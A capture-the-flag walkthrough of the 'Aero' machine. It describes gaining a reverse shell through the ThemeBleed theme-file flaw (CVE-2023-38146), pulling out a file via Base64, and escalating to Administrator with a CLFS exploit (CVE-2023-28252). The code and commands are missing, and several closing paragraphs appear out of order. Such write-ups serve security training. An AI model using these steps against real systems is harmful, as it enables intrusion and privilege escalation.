Aero
Last updated
Last updated
Let's start by enumerating ports using Nmap:
The scan result indicates that only port 80 with Microsoft-IIS/10.0 server is open.
After entering the IP address of the machine in the browser, we get the following page:
The description on the webpage indicates that the website is intended to allow users to upload themes for Windows 11 operating system:
Let's find an example .theme file, in our case it will be aero.theme and let's upload to the webpage:
The file upload seems to be working fine. Attempts to upload a file with an extension other than .theme or .themepack fails:
Let's search the Internet for information related to vulnerabilities connected with using theme files.
We do not know what version of the Windows operating system we are dealing with, but searching results on Google indicates that Microsoft-IIS/10.0 was introduced with Windows Server 2016 and Windows 10. So we can assume that the operating system may also be Windows 11. Let's look for an exploit that we can use against the vulnerability we found.
PoC
The code exploiting the vulnerability can be found in the following repository:
Let's download the release of this repository first. The ThemeBleed.zip file we downloaded contains the following files:
The README file indicates that ThemeBleed.exe allows us to do 3 things: start the server, generate a .theme file referencing a specific host, or generate a .themepack file referencing a specific host. There are 3 binary files in the data directory: stage_1, stage_2 and stage_3. To create our payload we have to create a DDL with an exported name VerifyThemeVersion, and replace stage_3 with the library we created.
Let's open Visual Studio, select Create new project and then choose Dynamic-Link Library (DLL):
Let's name our solution stage_3. After creating the solution we should have the following files:
Let's add the rev_shell.cpp and rev_shell.h files to our project. After adding them, the project structure should look like this:
Let's include rev_shell.h in the pch.h file. The pch.h file after including the header file:
Let's move to the rev_shell.cpp file. First, let's find code in C++ that should allow us to get a reverse shell. In this case, we will use the code from the following repository:
After adapting the code to our problem, the rev_shell.cpp code looks as follows:
Exploit from GitHub starts the SMB server on port 445. Therefore, before starting the server, we should check whether this port is not currently busy. We can check it via the following command:
To free port 445 we need to set the startup type of Server Windows service to Disable and reboot Windows VM. After that, we can prepare a malicious theme aero.theme via the following command:
Let's start the server:
And let's run listener:
Now upload the prepared aero.theme file to the webpage:
In the console with the server running, we can see that thestage_3 library has been loaded:
Let's check if we managed to get the reverse shell:
Success! We received the reverse shell as a user sam.emerson:
The user flag can be obtained from C:\Users\sam.emerson\Desktop\user.txt.
In sam.emerson user Documents we found a pdf file which name is connected with one of the CVEs:
The easiest way to get CVE-2023-28252_Summary.pdf file is to encode it to Base64 and decode it using CyberChef. Let's change the console to PowerShell and encode the file via the following command:
Use the CyberChef to decode it from Base64:
Now save the file as CVE-2023-28252_Summary.pdf. Let's check its contents:
Let's look for an exploit for this vulnerability:
Let's download the contents of the repository to the attacking virtual machine and open the solution using Visual Studio:
The solution only contains 1 .cpp file - clfs_eop.cpp file. Let's analyze its code:
Now let's go to the directory where the compiled executable file clfs_eop.exe is located, and run a Python HTTP server:
Let's move to our target machine and download the file clfs_eop.exe via the following command:
The file was downloaded:
Let's prepare the listener:
And let's execute clfs_eop.exe on attacking machine:
In the listener, we received a connection:
Let's check which user we are:
The root flag can be obtained from the following location C:\Users\Administrator\Desktop\root.txt.
Due to information found in Microsoft , Windows themes should have .theme or .themepack extension. Now let's move on to file transfers:
The search results lead us to the vulnerability identified as CVE-2023-38146, which may occur in the Windows 11 operating system. The on Microsoft's website shows that this vulnerability may lead to remote code execution. This vulnerability might be exploited by loading the Windows theme file with access to an attacker-controlled SMB share.
We want to create a DLL with a payload that would enable us to obtain a reverse shell. To create it we have to switch from Linux VM to Windows VM with Visual Studio installed. Walkthrough how to create your own DLL library using Visual Studio can be found .
According to the information from the repository containing the exploit, we should add the export of VerifyThemeVersion function to our file rev_shell.h. Information on how to do that can be found on the . After adding an export our file rev_shell.h should look as follows:
The pdf file contains information about CVE-2023-28252, which use may lead to privilege escalation. This document also indicates the existence of a security patch released by Microsoft in April 2023. Internet search indicate that the patch for this vulnerability was released on April 11, 2023, and that Windows 11 may also be vulnerable.
At the end of the file, we can see that notepad.exe is executed if privilege escalation is successful. We want to change this payload so that it allows us to get a reverse shell as a system user. In this case, we will use PowerShell #3 (Base64) a payload from website. Don't forget to change IP address and port number. Let's paste the reverse shell into the code instead of notepad.exe , and build the project to Release.
